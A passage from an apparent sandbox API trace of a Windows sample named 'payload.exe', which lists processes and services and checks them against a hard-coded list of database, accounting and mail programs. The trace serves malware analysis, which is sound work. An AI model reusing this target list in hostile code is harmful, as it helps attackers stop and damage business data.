lpString2="svchost.exe") returned -1 [0262.774] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0262.774] lstrlenW (lpString="userinit.exe") returned 12 [0262.775] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0262.775] lstrlenW (lpString="dwm.exe") returned 7 [0262.775] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.775] lstrlenW (lpString="explorer.exe") returned 12 [0262.775] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0262.775] lstrlenW (lpString="spoolsv.exe") returned 11 [0262.775] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0262.775] lstrlenW (lpString="taskhost.exe") returned 12 [0262.776] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.776] lstrlenW (lpString="svchost.exe") returned 11 [0262.776] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0262.776] lstrlenW (lpString="payload.exe") returned 11 [0262.776] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0262.776] lstrlenW (lpString="dllhost.exe") returned 11 [0262.776] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0262.776] lstrlenW (lpString="reader_sl.exe") returned 13 [0262.777] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x53c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0262.777] lstrlenW (lpString="cmd.exe") returned 7 [0262.777] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0262.777] lstrlenW (lpString="conhost.exe") returned 11 [0262.777] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x608, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0262.777] lstrlenW (lpString="mode.com") returned 8 [0262.777] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x608, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0262.778] CloseHandle (hObject=0x130) returned 1 [0262.778] Sleep (dwMilliseconds=0x1f4) [0263.307] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x580328 [0263.525] EnumServicesStatusExW (in: hSCManager=0x580328, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0263.525] GetLastError () returned 0xea [0263.525] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa64) returned 0x580ae8 [0263.525] EnumServicesStatusExW (in: hSCManager=0x580328, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x580ae8, cbBufSize=0xa64, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x580ae8, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0263.525] CloseServiceHandle (hSCObject=0x580328) returned 1 [0263.525] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0263.525] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0263.525] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0263.526] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0263.526] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0263.526] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0263.526] lstrlenW (lpString="AudioSrv") returned 8 [0263.526] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0263.526] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0263.526] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0263.526] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0263.526] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0263.526] lstrlenW (lpString="BFE") returned 3 [0263.526] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0263.526] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0263.526] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0263.526] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0263.526] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0263.526] lstrlenW (lpString="CscService") returned 10 [0263.526] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0263.526] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0263.526] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0263.526] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0263.526] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0263.526] lstrlenW (lpString="DcomLaunch") returned 10 [0263.526] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0263.526] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0263.526] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0263.526] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0263.526] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0263.526] lstrlenW (lpString="Dhcp") returned 4 [0263.526] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0263.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0263.527] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0263.527] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0263.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0263.527] lstrlenW (lpString="Dnscache") returned 8 [0263.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0263.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0263.527] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0263.527] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0263.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0263.527] lstrlenW (lpString="eventlog") returned 8 [0263.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0263.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0263.527] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0263.527] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0263.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0263.527] lstrlenW (lpString="EventSystem") returned 11 [0263.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0263.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0263.527] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0263.527] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0263.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0263.527] lstrlenW (lpString="gpsvc") returned 5 [0263.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0263.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0263.527] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0263.527] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0263.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0263.527] lstrlenW (lpString="lmhosts") returned 7 [0263.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0263.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0263.528] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0263.528] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0263.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0263.528] lstrlenW (lpString="MMCSS") returned 5 [0263.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0263.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0263.528] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0263.528] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0263.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0263.528] lstrlenW (lpString="MpsSvc") returned 6 [0263.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0263.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0263.528] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0263.528] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0263.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0263.528] lstrlenW (lpString="nsi") returned 3 [0263.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0263.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0263.528] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0263.528] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0263.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0263.528] lstrlenW (lpString="PlugPlay") returned 8 [0263.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0263.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0263.528] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0263.528] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0263.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0263.528] lstrlenW (lpString="Power") returned 5 [0263.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0263.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0263.529] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0263.529] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0263.529] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0263.529] lstrlenW (lpString="ProfSvc") returned 7 [0263.529] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0263.529] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0263.529] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0263.529] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0263.529] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0263.529] lstrlenW (lpString="RpcEptMapper") returned 12 [0263.529] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0263.529] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0263.529] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0263.529] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0263.529] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0263.529] lstrlenW (lpString="RpcSs") returned 5 [0263.529] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0263.529] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0263.529] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0263.529] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0263.529] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0263.529] lstrlenW (lpString="SamSs") returned 5 [0263.529] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0263.529] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0263.529] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0263.529] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0263.529] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0263.529] lstrlenW (lpString="Schedule") returned 8 [0263.529] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0263.529] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0263.530] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0263.530] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0263.530] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0263.530] lstrlenW (lpString="SENS") returned 4 [0263.530] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0263.530] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0263.530] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0263.530] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0263.530] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0263.530] lstrlenW (lpString="ShellHWDetection") returned 16 [0263.530] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0263.530] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0263.530] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0263.530] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0263.530] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0263.530] lstrlenW (lpString="Spooler") returned 7 [0263.530] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0263.530] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0263.530] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0263.530] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0263.530] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0263.530] lstrlenW (lpString="Themes") returned 6 [0263.530] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0263.530] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0263.530] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0263.530] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0263.530] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0263.530] lstrlenW (lpString="UxSms") returned 5 [0263.530] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0263.531] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0263.531] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0263.531] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0263.531] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0263.531] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x580ae8 | out: hHeap=0x520000) returned 1 [0263.531] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140 [0263.532] Process32FirstW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.532] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0263.532] lstrlenW (lpString="System") returned 6 [0263.532] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0263.532] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0263.532] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0263.532] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0263.532] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0263.532] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0263.533] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0263.533] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0263.533] lstrlenW (lpString="smss.exe") returned 8 [0263.533] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0263.533] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0263.533] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0263.533] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0263.533] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0263.533] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0263.533] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0263.533] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.533] lstrlenW (lpString="csrss.exe") returned 9 [0263.533] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0263.533] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0263.533] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0263.533] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0263.533] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0263.533] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0263.534] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0263.534] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0263.534] lstrlenW (lpString="wininit.exe") returned 11 [0263.534] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0263.534] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0263.534] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0263.534] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0263.534] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0263.534] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0263.534] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0263.534] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.534] lstrlenW (lpString="csrss.exe") returned 9 [0263.534] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0263.534] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0263.534] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0263.534] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0263.534] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0263.534] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0263.535] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0263.535] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0263.535] lstrlenW (lpString="winlogon.exe") returned 12 [0263.535] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0263.535] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0263.535] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0263.535] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0263.535] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0263.535] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0263.535] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0263.535] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0263.535] lstrlenW (lpString="services.exe") returned 12 [0263.535] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0263.535] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0263.535] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0263.535] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0263.535] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0263.535] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0263.535] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0263.535] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0263.536] lstrlenW (lpString="lsass.exe") returned 9 [0263.536] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0263.536] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0263.536] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0263.536] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0263.536] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0263.536] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0263.536] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0263.536] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0263.536] lstrlenW (lpString="lsm.exe") returned 7 [0263.536] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0263.536] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0263.536] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0263.536] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0263.536] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 